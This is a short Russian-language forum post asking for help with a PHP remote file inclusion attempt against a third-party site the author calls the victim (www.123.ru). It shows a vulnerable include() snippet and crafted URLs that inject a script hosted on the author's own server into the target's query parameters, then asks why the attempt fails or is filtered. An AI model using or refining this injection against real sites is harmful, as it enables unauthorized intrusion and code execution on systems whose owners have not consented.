наконец себе делал хост и пытаюсь поэкспереминтировать PHP инекции.
у меня сайт такой:
www.mysite.ru
цель: www.123.ru
на мой сайт залил скрипт:
Код:
<?
..
Include ("$page.php");
…
?>
открываю сайт жертвы, захожу в любой раздел и получаю такой адрес:
http://www.123.ru/index.php?action=page&id=149
мой код на сервере под названием ххх.php.
я переделываю ссылку так:
http://www.123.ru/index.php?action=
http://mysite.ru/xxx.php
- открывается главная страница.
делаю так:
http://www.123.ru/index.php?action=page&id=
http://mysite.ru/xxx.php
пишет:
Запрашиваемая вами страница не найдена.
Я ошибку делаю, или просто на сайте фильтровывается ?
P.S. читал здесь:
http://forum.antichat.ru/thread12123-lfi.html